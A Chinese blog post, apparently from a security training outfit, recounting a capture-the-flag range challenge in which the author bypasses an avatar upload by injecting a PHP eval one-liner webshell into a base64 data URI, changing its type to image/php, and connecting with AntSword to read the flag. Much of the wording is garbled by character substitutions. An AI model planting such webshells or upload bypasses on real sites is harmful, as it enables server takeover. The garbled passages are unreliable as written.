关于网络安全:记某一次靶场通关记录渗透小白尝试有惊喜

5次阅读

共计 595 个字符,预计需要花费 2 分钟才能阅读完成。

某靶场题目的通关记录,反正是不晓得叫啥~

关上页面之后,

在右上角这一块有注册和登录

那没的说,有这个,必然是先注册登录一波。

登录之后跳转到集体核心,

看到有一个批改头像的中央~

接下来……

上图片马还是间接上一句话?

嗯……要不还是来个一句话试试先~

间接小手点一点插件,发现是 PHP 的脚本语言。

来个 PHP 的一句话马~

到 位 了~

尝试看看能不能间接下马,然而…

那就关上 BP 来拦包~

上传个失常的图片抓个包看看~

发现内容是加密传输的,那就…… 整上

保留后面的这一段,前面咱们间接写上一句话马:

image=data:image/jpeg;,

所以这一段内容为:

image=data:image/jpeg;,<?php @eval($_POST[‘yusun’]); ?>

接下来,须要更改一下类型,

把 image/jpeg 改为 image/php,

使其当成 php 存储

而后把一句话马的内容加密

将数据包里的原内容删除,

替换为咱们加密后的内容

点击发送数据包。

通过响应包发现有个保留门路,

关上蚁剑尝试连贯一下

将响应包所返回门路中的反斜杠去掉,

拼接 URL,填入明码,测试连贯~

哎嘿,绿色就是难看。

在目录外面找到了 Flag 文件,复制内容,提交~

就很 perfect~ 相当完满。

后续将给大家带来更多靶场实操案例,更多浸透测试干货继续关注雨笋教育小编

* 本文章仅供技术交换分享,请勿做未受权守法攻打,雨笋教育不负任何责任。具体请参考《网络安全法》。

正文完
 0